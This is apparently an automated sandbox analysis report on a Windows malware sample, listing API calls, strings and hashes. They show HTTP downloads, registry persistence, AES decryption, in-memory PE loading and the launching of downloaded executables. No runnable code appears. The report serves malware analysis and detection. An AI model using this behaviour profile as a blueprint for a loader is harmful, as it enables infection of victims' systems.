                                                • CoCreateInstance.OLE32(0041F290,00000000,00000001,0041F260,?,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404C5A
                                                • __Init_thread_footer.LIBCMT ref: 004050BD
                                                • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                                • __Init_thread_footer.LIBCMT ref: 004053CB
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D), ref: 00404CC8
                                                  • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,024FEF0D), ref: 004107F7
                                                  • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                                • CoUninitialize.COMBASE(?,00406AA1,0041D805,0042DA9C,0042DA9D,?,00000000,00000000,0042DC1C,0042DC1D,?,?,?,?,00000000,0042DA28), ref: 00404D01
                                                • CoUninitialize.OLE32(?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404DC4
                                                • CoUninitialize.OLE32(?,?,?,?,?,0042DC1D,?,?,?,?,00000000,0042DA28,0042DA29), ref: 00404E45
                                                • __Init_thread_footer.LIBCMT ref: 00404026
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                  • Part of subcall function 004021F0: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                                  • Part of subcall function 004021F0: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                                  • Part of subcall function 004021F0: CloseHandle.KERNEL32(00000000), ref: 0040224E
                                                • __Init_thread_footer.LIBCMT ref: 00404202
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Init_thread_footer$CriticalSection$CreateFileUninitialize$EnterLeavePathSleepTime$ByteCharCloseConditionDirectoryFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@VariableWakeWideWrite__ehfuncinfo$??2@
                                                • String ID: KDOX$SUB=$]DFE$^OX*$get$viFO
                                                APIs
                                                  • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,024FEF0D), ref: 004107F7
                                                  • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 004050BD
                                                • Sleep.KERNEL32(00000BB8,00000000,?,00406A81,0041D8A0,0042DB20,0042DB21), ref: 004052D5
                                                • __Init_thread_footer.LIBCMT ref: 004053CB
                                                • Sleep.KERNEL32(000007D0), ref: 00405735
                                                • Sleep.KERNEL32(000007D0), ref: 0040574F
                                                • CoUninitialize.OLE32(?,?,0042DB3D,?,?,?,?,?,?,?,?,?,?,00000000,0042DB21), ref: 00405785
                                                • CoUninitialize.OLE32(?,?,?,?,?,0042DB3D,?,?,?,?,?,?,?), ref: 004057B1
                                                • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405903
                                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405925
                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040594D
                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405956
                                                • Sleep.KERNEL32(000005DC), ref: 00405A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                                                • String ID: DFEK$SUB=$get$mixone$updateSW$U%

                                                Control-flow Graph
                                                • control_flow_graph 2198 (402ec0-402ede)
                                                APIs
                                                • SetLastError.KERNEL32(0000000D), ref: 00402EE2
                                                • SetLastError.KERNEL32(000000C1), ref: 00402F24
                                                Strings
                                                • p.@P.@0.@, xrefs: 004030C5
                                                • ERROR_OUTOFMEMORY!, xrefs: 00403042
                                                • DOS header size is not valid!, xrefs: 00402F51
                                                • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402F93
                                                • Size is not valid!, xrefs: 00402EE8
                                                • DOS header is not valid!, xrefs: 00402F12
                                                • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402F81
                                                • Section alignment invalid!, xrefs: 00402FA7
                                                • alignedImageSize != AlignValueUp!, xrefs: 0040300C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!$p.@P.@0.@
                                                • API String ID: 1452528299-2075088523
                                                • Opcode ID: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                                • Instruction ID: 9256140b0f890bfcd87a01f3051d579660d3e2dc250f0df49545701e60f9fd82
                                                • Opcode Fuzzy Hash: 93a66e001e3ee66e65f00ee5565e1e2522c51b5cf1621d66301cec4e888181c2
                                                • Instruction Fuzzy Hash: CCF1CE71B002059BCB10CFA9D985BAAB7B4BF48305F14417AE909EB3C2D779ED11CB98

                                                Control-flow Graph

                                                APIs
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,024FEF0D), ref: 00403630
                                                • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403654
                                                • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036BE
                                                • GetLastError.KERNEL32 ref: 004036C8
                                                • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 004036F0
                                                • GetLastError.KERNEL32 ref: 004036FA
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040370A
                                                • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037CC
                                                • CryptDestroyKey.ADVAPI32(?), ref: 0040383E
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040360C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 3761881897-63410773
                                                • Opcode ID: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                                • Instruction ID: 8181a1f98bd0149a833479ac616fd79743055c61a592a1420c0c523c4d9566d8
                                                • Opcode Fuzzy Hash: 7f6218a34b9754140a9e9fc40106ac4304b7aaa720599af0eabc3a8fdf2c6258
                                                • Instruction Fuzzy Hash: 37819171A00218AFEF209F25CC45B9ABBB9FF45300F0081BAF90DA7291DB359E858F55

                                                Control-flow Graph

                                                APIs
                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AC8
                                                • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402ADD
                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402AEB
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B06
                                                • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B25
                                                • LocalFree.KERNEL32(00000000), ref: 00402B32
                                                • LocalFree.KERNEL32(?), ref: 00402B37
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                                                • String ID: %s: %s$Error protecting memory page
                                                • API String ID: 839691724-1484484497
                                                • Opcode ID: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                                • Instruction ID: 0c0000675eadf2e66051917e59d7aa22c0aaa2fc97c5d5fe75df83e4770fcd9e
                                                • Opcode Fuzzy Hash: f25455ec320cf7d64a2bc5a19560f05570590d079a315ae6df6c255a1a5fbc21
                                                • Instruction Fuzzy Hash: 4B310731B00104AFDB10DF68DD44FAAB768EF48704F0541BEE905AB2D2DB75AE06CB98

                                                Control-flow Graph

                                                APIs
                                                • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 004019D5
                                                • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 004019F8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: FileInternet$PointerRead
                                                • String ID: text
                                                • API String ID: 3197321146-999008199
                                                • Opcode ID: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                                • Instruction ID: 0125e10c814f2167b0c83c61a86ba883da1fe49b2781431745f5a2561ed14111
                                                • Opcode Fuzzy Hash: 5d2b67920e7965021a67acd32ea28e335973d0b9692ae9a2ead62ee0d6d92aa5
                                                • Instruction Fuzzy Hash: FAC15B709002189FDB24DF64CC85BD9B7B5EF49304F1041EAE509B72A1D778AE94CF99

                                                Control-flow Graph

                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00F6D12E
                                                • Module32First.KERNEL32(00000000,00000224), ref: 00F6D14E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2878196099.0000000000F6C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F6C000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f6c000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 3833638111-0
                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction ID: cb750a258ba939d2cfd1ff35cd4ffb1700b0927956cb05e2c040d439c5747031
                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                • Instruction Fuzzy Hash: 9FF06232A007146BE7203AF5988DBAA76F8AF8A735F100528E642910C0DAB4E8459A61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: emp$mixtwo
                                                • API String ID: 3472027048-2390925073
                                                • Opcode ID: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                                • Instruction ID: d670b023532553bde9b5cd74a18030282768016b503e3e09e149c4df20b712b6
                                                • Opcode Fuzzy Hash: 25b80a3ffdd21913e586197d89a1d0a7f06881a9f76e4fd5286830887ded5122
                                                • Instruction Fuzzy Hash: 15F01CB161430457E7147F65ED1B7173EA4970271CFA006ADD8141F2C2E7FB861A8BE6

                                                Control-flow Graph

                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 1000152A
                                                • __cftof.LIBCMT ref: 10001624
                                                • InternetOpenA.WININET(?,?,?,00000000,00000000), ref: 1000163D
                                                • InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 10001660
                                                • InternetConnectA.WININET(00000000,?,00000050,?,?,00000003,00000000,00000001), ref: 10001680
                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,80400000,00000001), ref: 100016B0
                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 100016C9
                                                • InternetCloseHandle.WININET(00000000), ref: 100016E0
                                                • InternetCloseHandle.WININET(00000000), ref: 100016E3
                                                • InternetCloseHandle.WININET(00000000), ref: 100016E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectH_prolog3_OptionSend__cftof
                                                • String ID: GET$http://
                                                • API String ID: 1233269984-1632879366
                                                • Opcode ID: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                • Instruction ID: 7cfd31fe4164df5669dc4f011f358c4066a4bf273ac9d15a63e71752a24e0b34
                                                • Opcode Fuzzy Hash: 6ef726b70a96d5212e420baa69142e1171cf0ccdfb6c98ffbdd36cdffced8e0e
                                                • Instruction Fuzzy Hash: D5518F75E01618EBEB11CBE4CC85EEEB7B9EF48340F508114FA11BB189D7B49A45CBA0

                                                Control-flow Graph

                                                APIs
                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401873
                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401899
                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018BF
                                                  • Part of subcall function 00402470: Concurrency::cancel_current_task.LIBCPMT ref: 00402599
                                                • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018E5
                                                Strings
                                                • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 00401877
                                                • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018C3
                                                • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 0040189D
                                                • text, xrefs: 00401B5F
                                                • http://, xrefs: 00401EC4, 004021A3
                                                • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401832
                                                • GET, xrefs: 004020B7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                                                • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                                                • API String ID: 2146599340-4172842843
                                                • Opcode ID: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                                • Instruction ID: d9449a1bc553b4f7263359658e85a8d5597bae1f9675cad689ed873ec2693fe7
                                                • Opcode Fuzzy Hash: 63080466dd17a9b8a4ff43f685a9b199d52acbea20d3452c9180351abca4782c
                                                • Instruction Fuzzy Hash: A4316371D00109AFEB14DBE9CC85FEEB7B9EB08714F60812AE521731C0C7789945CBA4

                                                Control-flow Graph

                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 04B6024D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID: cess$kernel32.dll
                                                • API String ID: 4275171209-1230238691
                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction ID: 028426c1fa3081d0d28a70eaa3d0da4b1e0b558b2b709878370dc2549d702951
                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                • Instruction Fuzzy Hash: 3D526A74A01229DFDB64CF59C984BACBBB1BF09304F1480D9E94EAB351DB34AA85DF14

                                                Control-flow Graph

                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                • String ID: text
                                                • API String ID: 1154000607-999008199
                                                • Opcode ID: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                • Opcode Fuzzy Hash: a1e379d679c24b6df6bb2eefa12ec4263e14a704e2d288e5f5fa36855e8b81ad
                                                • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                                APIs
                                                  • Part of subcall function 004107E2: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A7F,00000000,024FEF0D), ref: 004107F7
                                                  • Part of subcall function 004107E2: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410816
                                                • Sleep.KERNEL32(000005DC), ref: 00405A90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: SUB=$get$U%
                                                • API String ID: 2563648476-1840017472
                                                • Opcode ID: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                                • Instruction ID: c38411781881cdafda6c84006562c20812e5f10be50bcbbeaff71a156a434d29
                                                • Opcode Fuzzy Hash: 167d1afffcf2c6992d5677df203f6ddfa97db10191ac7580195699f566a7dfe0
                                                • Instruction Fuzzy Hash: 04323171D101089BCB19FBB5C95AADE73786F14308F50817FE856771C2EE7C6A08CAA9

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                  • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: .exe$open
                                                • API String ID: 1627157292-49952409
                                                • Opcode ID: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                • Opcode Fuzzy Hash: e7d307bd9b08359f9d4fa667b823f6c82abf28f5e9ce0c80c34beec9c79a4aa9
                                                • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62

                                                Control-flow Graph

                                                [Graph for function 401e20; calls InternetOpenA]
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: http://
                                                • API String ID: 0-1121587658
                                                • Opcode ID: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                                • Instruction ID: 09126ff878240097ddd60f0c8300d9112e53121ff3c2cf1df5c9ef382bee38eb
                                                • Opcode Fuzzy Hash: 9432e62186f2f9598efc4e2b603940abe351034223c82a34c2a9509acc0423bb
                                                • Instruction Fuzzy Hash: 1A518E71E002099FDF14CFA9C895BEEB7B9EB08304F10812EE915BB6C1C779A944CB94

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009B364B
                                                • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009B3672
                                                • GetNativeSystemInfo.KERNEL32(?), ref: 009B36C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AE000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9ae000_file.jbxd
                                                Similarity
                                                • API ID: Open$InfoNativeSystem
                                                • String ID:
                                                • API String ID: 1247124224-0
                                                • Opcode ID: 8b6765ee5b148295bd6b7fdc7c76ab0e347212f1dffaea525dd71995e5d4ed4c
                                                • Instruction ID: 34596642439b3a6b247729d73a1ab005ad5b06c0b8d848a55199c87974dd469c
                                                • Opcode Fuzzy Hash: 8b6765ee5b148295bd6b7fdc7c76ab0e347212f1dffaea525dd71995e5d4ed4c
                                                • Instruction Fuzzy Hash: BB419FB100420FDBDB11EF60CA497EE37A8EF05324F104525D981C6952E6B98DA5CF59

                                                Control-flow Graph

                                                APIs
                                                • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 009B364B
                                                • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 009B3672
                                                • GetNativeSystemInfo.KERNEL32(?), ref: 009B36C9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877232140.00000000009AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 009AE000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_9ae000_file.jbxd
                                                Similarity
                                                • API ID: Open$InfoNativeSystem
                                                • String ID:
                                                • API String ID: 1247124224-0
                                                • Opcode ID: f654361306d3baa665c2dccf2fc8aeed625d44335d180f470f45fc91e7850630
                                                • Instruction ID: 78e94093ff10a425129cba62758ae7f2e3e4a7d173d19cbf3e75fc5e8e84d922
                                                • Opcode Fuzzy Hash: f654361306d3baa665c2dccf2fc8aeed625d44335d180f470f45fc91e7850630
                                                • Instruction Fuzzy Hash: AB21287100014FDEEB12DF60CA49BDE3BA9EF06325F208125D881C6912E7764DA5CF18

                                                Control-flow Graph

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00402226
                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402247
                                                • CloseHandle.KERNEL32(00000000), ref: 0040224E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID:
                                                • API String ID: 1065093856-0
                                                • Opcode ID: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                                • Instruction ID: 5700bef43f604e24781938fdb315806f7bd82b17c931dadbe0ad0f8cbe635642
                                                • Opcode Fuzzy Hash: d9729f344c6c322aed8993abd69ccd2b034d96b2116c2c448128c12d9a7231e9
                                                • Instruction Fuzzy Hash: 2B01D272600208ABDB20DBA8DD49FAEB7E8EB48714F40417EFA05A62D0CBB46945C758

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32(08758BC2,?,00410530,00000016,0040CDA2,?,08758BC2,024FEF0D,0040CDA2,08758BC2), ref: 00410547
                                                • TerminateProcess.KERNEL32(00000000,?,00410530,00000016,0040CDA2,?,08758BC2,024FEF0D,0040CDA2,08758BC2), ref: 0041054E
                                                • ExitProcess.KERNEL32 ref: 00410560
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                                • Instruction ID: 67797f44d9d46dd495823d9566bad27c4dc507fd550e6630b3786a266b8fea83
                                                • Opcode Fuzzy Hash: 51baef39f8712e3c962c42c17cb56c32fa66d4279d62b7c7599e975f33ebcb9d
                                                • Instruction Fuzzy Hash: A0D09E31000108FBCF11AF61DC0D8CD3F26AF40355B008035BD0945131DFB59DD69E48
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132C7
                                                • GetLastError.KERNEL32(00000000,?,00418A2B,00000000,00000000,00000000,?,00418A50,00000000,00000007,00000000,?,00418D2F,00000000,00000000), ref: 004132D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 485612231-0
                                                • Opcode ID: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                                • Instruction ID: d8d9c1c0f29fd1ae3c391d4f931883298020c9469a54bb124b4f82b2896bf902
                                                • Opcode Fuzzy Hash: 57565e6569af0ee8b6bc535b15a06f29f01c2303c5bd8ca1e852723f0256f5c9
                                                • Instruction Fuzzy Hash: E6E0E6356002146BCB113FB5AC097D57F68AB44759F114076F60C96161D6398996879C
                                                APIs
